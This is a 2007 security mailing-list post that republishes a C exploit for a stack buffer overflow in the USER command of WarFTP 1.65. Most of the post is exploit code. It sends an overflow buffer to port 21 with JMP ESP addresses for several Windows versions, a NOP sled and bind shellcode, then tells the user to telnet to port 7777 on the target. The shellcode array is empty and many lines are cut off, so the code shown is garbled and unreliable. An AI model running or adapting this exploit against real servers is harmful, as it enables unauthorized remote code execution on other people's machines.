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[EXPL] WarFTP Stack Based Buffer Overflow (Username)

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From: SecuriTeam <>
To: [email protected]
Date: 26 Mar 2007 13:43:39 +0200
Subject: [EXPL] WarFTP Stack Based Buffer Overflow (Username)
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  WarFTP Stack Based Buffer Overflow (Username)


WarFTP is prone to a stack-based buffer-overflow vulnerability because it 
fails to properly check boundaries on user-supplied data before copying it 
to an insufficiently sized buffer.


Vulnerable Systems:
 * WarFTP version 1.65

#include <stdio.h>
#include <string.h>
#include <winsock.h>

#define VULNSERVER         "WAR-FTPD 1.65"
#define VULNCMD     "\x55\x53\x45\x52\x20"
#define ZERO                        '\x00'
#define NOP                         '\x90'
#define VULNBUFF                      485
#define BUFFREAD                      128
#define PORT                           21
#define LENJMPESP                       4

/* #######################
   #####                      WARFTP - VERSION 1.65                        
   #####     WarFTP Username Stack-Based Buffer-Overflow Vulnerability     
   #####  DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow    
   #####     vulnerability because it fails to properly check boundaries   
   #####     on user-supplied data before copying it to an insufficiently  
   #####     sized buffer.                                                 
   #####  FUNC VULNERABLE: sprintf(char *buffer, const char *format, argv) 
   #####       0x004044E7: sprintf(0x00ACFB50, "%sCRLF", ExploitBuffer)    
   #####  AFFECTED VERSION: 1.65                                           
   #####  USE: warftphack.exe IP_ADDRESS SO_&_SERVICE_PACK [ ESP ADDRESS ] 
   #####     SO_&_SERVICE_PACK:                                            
   #####        [0]  Microsoft Windows XP Pro Spanish SP0                  
   #####        [1]  Microsoft Windows XP Pro Spanish SP1                  
   #####        [2]  Microsoft Windows XP Pro Spanish SP2                  
   #####        [3]  Microsoft Windows XP Pro English SP0                  
   #####        [4]  Microsoft Windows XP Pro English SP1                  
   #####        [5]  Microsoft Windows XP Pro English SP2                  
   #####        [6]  Microsoft Windows 2000 Pro Spanish SP0                
   #####        [7]  Microsoft Windows 2000 Pro Spanish SP1                
   #####        [8]  Microsoft Windows 2000 Pro Spanish SP2                
   #####        [9]  Microsoft Windows 2000 Pro Spanish SP3                
   #####        [10] Microsoft Windows 2000 Pro English SP0                
   #####        [11] Microsoft Windows 2000 Pro English SP1                
   #####        [12] Microsoft Windows 2000 Pro English SP2                
   #####        [13] Microsoft Windows 2000 Pro English SP3                
   #####        [14] Custom -> JMP ESP ADDRESS                             
   #####     EXAMPLE:  warftphack.exe 2                          
   #####     EXAMPLE2: warftphack.exe 14 0x776EDDFF              
   #####  AUTOR: niXel - SYSCODE   (SPAIN)                                 
   #####  IDE: Dev-C ver-                                           
   #####  COMPILER: MinGW                                                  
   #####  DEPENDENCES: Linker -> libwsock32.a                              
   #####  MAIL: [email protected]                                

      CAUTION: USER command vulnerable => no send \x40 (@) char into 
shellcode (user@host)
                                          no send \x0A (\n) char into 
                                          no send \x0D (\r) char into 
               FUNCTION sprintf => no send \x00 (\0) char into shellcode

      ############################ BINDSHELLCODE 
char syscode[] =
int main(int argc, char ** argv) {
   char buffRead[BUFFREAD], jmpESP[LENJMPESP], ch, ch2;
   char * pbuffSend;
   unsigned int err = 0, i, k;
   int sockData, j;
   struct sockaddr_in their_addr;
   WSADATA wsaData;

   fprintf(stdout, "\n\tWarFTP Username Stack-Based Buffer-Overflow 
   fprintf(stdout, "     
   if (((argc == 3) && (atoi(argv[2]) >= 0) && (atoi(argv[2]) < 14)) || 
((argc == 4) && (atoi(argv[2]) == 14))) {
      if (WSAStartup(MAKEWORD(2, 0), &wsaData) == 0) {
         if ((sockData = socket(AF_INET, SOCK_STREAM, 0)) != -1) {
                                            /* Server data struct */

            their_addr.sin_family = AF_INET;                      // ; 
Family AF_INET
            their_addr.sin_addr.s_addr = inet_addr(argv[1]);      // ; IP 
Address = Argv[1]
            their_addr.sin_port = htons(PORT);                    // ; 
Port = 21
            memset(&(their_addr.sin_zero), '0', 8);               // ; 
IP:Port = Argv[1]:21
            if (connect(sockData, (struct sockaddr *) &their_addr, 
sizeof(struct sockaddr)) != -1) {
               recv(sockData, buffRead, BUFFREAD, 0);
               buffRead[BUFFREAD - 1] = ZERO;
               if (strstr(buffRead, VULNSERVER) != NULL) {
                  /* ###################################
                     ##### BufferSend -> "USER A*VULNBUFF @JMP_ESP 
\x90\x90\x90\x90 SYSCODE \r\n #####
                     ###################################### */
                  pbuffSend = (char *) malloc(strlen(VULNCMD) + VULNBUFF + 
LENJMPESP + (sizeof(char) * 4) + strlen(syscode) + (sizeof(char) * 2));
                  if (pbuffSend != NULL) {
                     for (i=0; i < strlen(VULNCMD); i++) *(pbuffSend + i) 
                     for (j=0; j < VULNBUFF; i++, j++) *(pbuffSend + i) = 
                     /*                      - OPcodes from ntdll.dll -> 
JMP ESP -                     */
                     switch(atoi(argv[2])) {
                        case 0: memcpy(jmpESP, "\xE3\x39\xF4\x77", 
LENJMPESP); break;
                        case 1: memcpy(jmpESP, "\x0F\x98\xF8\x77", 
LENJMPESP); break;
                        case 2: memcpy(jmpESP, "\xED\x1E\x95\x7C", 
LENJMPESP); break;
                        case 3: memcpy(jmpESP, "\xE3\x39\xF4\x77", 
LENJMPESP); break;
                        case 4: memcpy(jmpESP, "\xCC\x59\xFA\x77", 
LENJMPESP); break;
                        case 5: memcpy(jmpESP, "\xED\x1E\x95\x7C", 
LENJMPESP); break;
                        case 6: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 7: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 8: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 9: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 10: memcpy(jmpESP, "\x8B\x94\xF8\x77", 
LENJMPESP); break;
                        case 11: memcpy(jmpESP, "\xAB\x67\xF9\x77", 
LENJMPESP); break;
                        case 12: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 13: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 14:
                           k = 0;
                           if ((strncmp(argv[3], "0x", (sizeof(char) * 2)) 
== 0) && (strlen(argv[3]) == 10)) {
                              for (j=(sizeof(char) * 8) - 1; ((j >= 0) && 
(!err)); j--) {
                                 ch = *(argv[3] + j + 2);
                                 if (((ch > 47) && (ch < 58)) || ((ch > 
64) && (ch < 71)) || ((ch > 96) && (ch < 103))) {
                                    if ((ch > 47) && (ch < 58)) ch -= 48;
                                    else if ((ch > 64) && (ch < 71)) ch -= 
                                    else ch -= 87;
                                    if ((j % 2) == 0) jmpESP[k++] = ((ch 
<<= 4) | ch2);
                                    else ch2 = ch;
                                 else { fprintf(stderr, "\t[ ERROR ] Three 
parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
                           else { fprintf(stderr, "\t[ ERROR ] Three 
parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
                     if (!err) {
                        for (j=0; j < LENJMPESP; i++, j++) *(pbuffSend + 
i) = jmpESP[j];
                        for (j=0; j < (sizeof(char) * 4); i++, j++) 
*(pbuffSend + i) = NOP;
                        for (j=0; j < strlen(syscode); i++, j++) 
*(pbuffSend + i) = syscode[j];
                        memcpy(pbuffSend + i, "\r\n", (sizeof(char) * 2));
                        if (i == send(sockData, pbuffSend, ++i, 0)) {
                          fprintf(stdout, "\t[ OK ] Exploit buffer send to 
%s:%d\n", argv[1], PORT);
                          fprintf(stdout, "\t[ OK ] If you have not chosen 
a correct operating system and\n\t       service pack you can cause a 
                          fprintf(stdout, "\t[ OK ] Connect: telnet %s 
7777\n", argv[1]);
                        else fprintf(stderr, "\t[ ERROR ] No sending all 
exploit buffer\n");
                  else fprintf(stderr, "\t[ ERROR ] No allocate 
               else fprintf(stderr, "\t[ ERROR ] Not a vulnerable 
            else fprintf(stderr, "\t[ ERROR ] Connect to %s:%d\n", 
argv[1], PORT);
         else fprintf(stderr, "\t[ ERROR ] Create local socket\n");
      else fprintf(stderr, "\t[ ERROR ] Load library");
   else {
      fprintf(stderr, "   [ + ] USE: %s IP_ADDRESS SERVICE_PACK [ 
ESP_ADDRESS ]\n\n", argv[0]);
      fprintf(stderr, "   [ + ] SERVICE PACK:  [ - ] Microsoft Windows XP 
Pro Spanish SP0 (0)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP1 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP2 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP0 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP1 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP2 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP0 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP1 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP2 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP3 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP0 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP1 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP2 
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP3 
      fprintf(stderr, "\t\t\t[ - ] Custom Service Pack - JMP %%ESP 
      fprintf(stderr, "   [ + ] EXAMPLE:  %s 2\n", argv[0]);
      fprintf(stderr, "   [ + ] EXAMPLE2: %s 14 0x776EDDFF\n", 
   fprintf(stdout, "     
   return 0;


The information has been provided by milw0rm.
The original article can be found at:

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